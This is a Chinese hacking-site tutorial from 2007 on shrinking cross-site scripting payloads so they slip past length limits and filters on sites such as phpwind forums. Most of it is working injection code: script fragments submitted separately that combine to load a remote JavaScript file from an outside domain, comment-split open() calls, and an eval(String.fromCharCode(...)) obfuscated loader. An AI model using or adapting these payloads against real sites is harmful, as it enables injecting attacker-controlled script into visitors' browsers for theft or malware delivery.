黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图
您现在的位置: 黑客风云 >> 黑客文章 >> 黑客入门 >> 电脑新手 >> 文章正文
[推荐]寻找最短的跨站代码
        ★★★★★
寻找最短的跨站代码
文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2007-7-7
那天剑心问我,最短的跨站语句是多少?要放在以前,我一定会这样想,正常的跨站代码:<script>alert("a")</script> ,查一下,一共27个字符。嘿嘿,不过,这之前我在《黑客手册》上看到了他的一篇文章,《疯狂的跨站之行》,在这其中提到了跨站语句的另一种方法:
以下是引用片段:
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.pc010'</script>
<script>z=z+'.cn/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.pc010'</script>
<script>z=z+'.cn/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>


将这些语句分别写入,只要所写入的语句在一个页面中显示,那么这些代码最后就会引入到变量z中,总到一块就是:
以下是引用片段:
document.write("<script src=http://www.pc010.cn/1.js></script>")


然后用eval()函数来执行这个z变量,就可以执行出跨站效果了。lcx在文章的评论中说,最小的有效利用代码可以是26个字母,就是<script>z=z+'d"'</script>,答案不就出来了,最小的跨站是26个字符。(今天在网上查找资料时,发现利用这种方法还可以少一个字符,就是:<script>z+='d"'</script>,用+=来代替=z+,嘿嘿,又可以减少一个字符,25个字符,不过,也好伤心,我好像只能在别人的基础上面有所突破!:( )。回复剑心后,他竟回了一个笑脸,我感觉这家伙一定又找出了更短的跨站方法。

果不其然,今天翻开《黑客手册》第九期中的《phpwind漏洞之行》(因为一些原因,好久没有仔细看过书了),在其中提到了更短的跨站代码,如下:

以下是引用片段:
<script>open(/*
*/"http://127"/*
*/+".0.0.1/"/*
*/)</script>

这其中的/*和*/是script的注释语句,将这些语句分别提交,同样的条件是这些提交的代码必须在一个页面中,这样最后所显示的就是:
以下是引用片段:
<script>open(/*不会显示的无效内容*/"http://127"/*不会显示的无效内容*/+".0.0.1/"/*不会显示的无效内容*/)</script>

那么这个的最短的语句是多少呢?貌似<script>不能分开应用,除了这个,script所定义的函数比如open之类的,好像分开后也不能正常运行了,这样的话,

先将最上面的语句:document.write("<script src=http://www.pc010.cn/1.js></script>") 转为10进制表示字符:

100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,115,99,114,105,112,116,32,115,114,99,61,104,116,
116,112,58,47,47,119,119,119,46,112,99,48,49,48,46,99,110,47,49,46,106,115,62,60,47,115,99,114,105,112,116,62,34,41,59

然后用eval加String.fromCharCode来执行:<script>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,115,99,114,105,112,116,32,115,114,99,61,104,116,
116,112,58,47,47,119,119,119,46,112,99,48,49,48,46,99,110,47,49,46,106,115,62,60,47,115,99,114,105,112,116,62,34,41,59))</script>

下面就用剑心的方法来进行拆分:
以下是引用片段:
<script>/*
*/eval(/*
*/String/*
*/./*
*/fromCharCode/*
*/(100,/*
*/111,99,/*
*/......./*
*/59))/*
*/</script>

中间的....表示的字符和前面的一样,这其中最长的一个语句是:*/fromCharCode/* ,16个字符,因为这是script自已保留的函数名,拆分的话,就不能运行了,由此可以看出,最小的跨站语句是由所采用的函数来定的。
文章录入:cainiaowang    责任编辑:cainiaowang 
  • 上一篇文章:

  • 下一篇文章: 没有了
    • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    抽根憋闷烟的心声
    学习网页制作的理由
    加入终身会员的理由!!!
    学习黑客编程的5大理由
    学习免杀的6大理由
    学习软件破解的理由
    会员账号开通查询
    常见问题解答
    汇款向导
    学员报名咨询
    最 新 热 门
    百度空间挂马分析!07-07
    电信禁止ADSL路由器上网的破解方07-04
    各种网页木马挂马的代码07-04
    简单打造不死鸽子07-02
    走进神秘的社会工程学07-02
    建立系统中别人永远删不掉的管理06-29
    入侵搜索关键字06-19
    phpwind、DZ论坛XSS跨站漏洞0DAY06-15
    如何提高提权效率06-14
    隐藏管理员账号三分钟搞定05-30
    5分钟激活Vista 免刷BIOS方法揭秘05-18
    最新挂马的方法大全05-17
    相 关 文 章
  • 各种网页木马挂马的代码

  • 淘宝taobao 跨站 XSS 漏洞

  • PHPWind-附件文件名跨站脚本漏洞

  • 最新QQ 163 126 等邮箱跨站挂马代码

  • phpwind、DZ论坛XSS跨站漏洞0DAY

  • 系统安全:系统命令 寻找系统端口与进程

  • PJblog跨站漏洞利用及修补

  • 对国内主流邮箱的跨站测试

  • 3389脚本开启代码(vbs版)

  • Windows Vista蓝屏代码含义和解决方案

  • QQ功能测试,寻找校园网测试人员

  • 如何测试PERL漏洞代码

    • Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886